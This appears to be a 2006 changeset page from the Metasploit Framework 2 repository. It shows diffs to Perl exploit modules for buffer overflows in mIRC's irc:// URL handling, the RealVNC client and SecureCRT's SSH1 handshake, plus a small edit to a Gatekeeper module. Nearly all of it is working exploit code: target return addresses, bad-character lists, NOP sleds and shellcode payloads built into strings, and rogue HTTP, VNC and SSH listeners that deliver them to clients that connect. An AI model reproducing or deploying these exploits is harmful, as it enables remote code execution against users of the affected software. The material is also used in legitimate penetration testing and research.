Changeset 3811
- Timestamp:
- 08/10/06 01:59:49 (2 years ago)
- Files:
-
- framework2/trunk/exploits/gatekeeper_overflow.pm (modified) (1 diff)
- framework2/trunk/exploits/mirc_url.pm (modified) (9 diffs)
- framework2/trunk/exploits/realvnc_client.pm (modified) (7 diffs)
- framework2/trunk/exploits/securecrt_ssh1.pm (modified) (4 diffs)
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework2/trunk/exploits/gatekeeper_overflow.pm
r3810 r3811 42 42 }), 43 43 44 # XXX NEEDS REFS 44 45 'Refs' => 45 46 [ framework2/trunk/exploits/mirc_url.pm
r3810 r3811 21 21 'Chunked' => [1, 'Enable chunked transfer encoding'], 22 22 }; 23 23 24 24 my $info = 25 25 { … … 32 32 creating a specially-crafted URL with a long string in the 33 33 "irc" protocol, a remote attacker can overflow a buffer and 34 34 execute arbitrary code on the system with privileges of the user. 35 35 }), 36 36 … … 50 50 'Space' => 350, 51 51 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 52 52 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44", 53 53 'Keys' => ['-bind', '+ws2ord'], 54 54 }, 55 55 56 57 58 59 56 'Encoder' => 57 { 58 'Keys' => [ '+alphanum' ], 59 }, 60 60 61 61 'Refs' => 62 62 [ 63 63 [ 'BID', '8819' ], 64 64 ], 65 65 … … 67 67 'Targets' => 68 68 [ 69 69 [ 'Windows 2000 Pro All English', 0x75022ac4 ], 70 70 ], 71 71 72 72 'Keys' => [ 'mirc' ], 73 73 … … 90 90 Listen => 1, 91 91 Proto => 'tcp' 92 );92 ); 93 93 my $client; 94 94 … … 100 100 101 101 my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? 102 103 102 Pex::Utils::SourceIP('1.2.3.4') : 103 $self->GetVar('HTTPHOST'); 104 104 105 105 $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/"); … … 119 119 # Set the remote host information 120 120 my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); 121 122 121 123 122 # Read the HTTP command 124 123 my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); 125 124 my $agent; 126 125 127 126 # Read in the HTTP headers 128 127 while ((my $line = $fd->RecvLine(10))) { 129 128 130 129 $line =~ s/^\s+|\s+$//g; 131 130 132 131 my ($var, $val) = split(/\:/, $line, 2); 133 132 … … 137 136 $agent = $val if $var =~ /User-Agent/i; 138 137 } 139 138 140 139 $self->PrintLine("[*] Client connected from $rhost:$rport ($agent)"); 141 140 … … 149 148 my $target = $self->Targets->[$self->GetVar('TARGET')]; 150 149 my $shellcode = $self->GetVar('EncodedPayload')->Payload; 151 152 153 154 150 my $filler = $self->MakeNops(1442 - length($shellcode)); 151 my $sploit = $filler. $shellcode. "\xeb\x06\x42\x96". pack('V', $target->[1]). 152 $self->MakeNops(10). "\xe8".pack('V',-435); 153 my $data = qq| 155 154 156 155 <html> 157 156 <head> 158 157 <title>One second please...</title> 159 <iframe src= irc://$sploit</iframe>158 <iframe src="irc://$sploit"></iframe> 160 159 </head> 161 <body id="oClientCaps">160 <body> 162 161 One second please... 163 162 </body> framework2/trunk/exploits/realvnc_client.pm
r3810 r3811 46 46 'BadChars' => "\x00", 47 47 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44", 48 48 'MaxNops' => 0, 49 49 'Keys' => [ '-ws2ord', '-bind' ], 50 50 }, … … 54 54 [ 'BID', '2305' ], 55 55 [ 'CVE', '2001-0167' ], 56 56 [ 'URL', 'http://www1.corest.com/common/showdoc.php?idxseccion=10&idx=116' ], 57 57 ], 58 58 … … 63 63 [ 'Windows 2000 SP4 English', 0x7c2ec68b ], 64 64 [ 'Windows XP SP2 English', 0x76b43ae0 ], 65 65 [ 'Windows 2003 SP1 English', 0x76aa679b ], 66 66 ], 67 67 … … 94 94 ReuseAddr => 1, 95 95 Listen => 1, 96 Proto => 'tcp'); 96 Proto => 'tcp' 97 ); 98 97 99 my $client; 98 100 … … 126 128 ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); 127 129 128 my $filler = $self->MakeNops(993 - length($shellcode)); 130 my $filler = $self->MakeNops(993 - length($shellcode)); 129 131 130 132 my $first = … … 132 134 133 135 my $second = 134 "\x00\x00\x00\x00\x00\x00\x04\x06". $filler. $shellcode. 135 136 137 136 "\x00\x00\x00\x00\x00\x00\x04\x06". $filler. $shellcode. 137 pack('V', $target->[1]). $self->MakeNops(10). "\xe8".pack('V', -457). 138 Pex::Text::AlphaNumText(200); 139 138 140 $self->PrintLine("[*] VNC Client connected from $rhost:$rport..."); 139 141 … … 152 154 153 155 $fd->Send($second); 154 156 155 157 $self->Handler($fd); 156 158 157 159 $fd->Close(); 158 160 } framework2/trunk/exploits/securecrt_ssh1.pm
r3810 r3811 29 29 Beta 2. By sending a vulnerable client an overly long 30 30 SSH1 protocol identifier string, it is possible to execute 31 31 arbitrary code. 32 32 }), 33 33 … … 56 56 [ 57 57 [ 'BID', '5287' ], 58 58 [ 'CVE', '2002-1059' ], 59 59 ], 60 60 … … 63 63 'Targets' => 64 64 [ 65 65 [ 'SecureCRT.exe (3.4.4)', 0x0041b3e0 ], 66 66 [ 'Windows 2000 SP4 English', 0x77e14c29 ], 67 67 [ 'Windows XP SP2 English', 0x77d57447 ], … … 130 130 131 131 my $sploit = 132 "SSH-1.1-OpenSSH_3.6.1p2\r\n". Pex::Text::AlphaNumText(243). 133 132 "SSH-1.1-OpenSSH_3.6.1p2\r\n". Pex::Text::AlphaNumText(243). 133 pack('V', $target->[1]). $self->MakeNops(20). $shellcode; 134 134 135 135 $self->PrintLine("[*] Client connected from $rhost:$rport...");
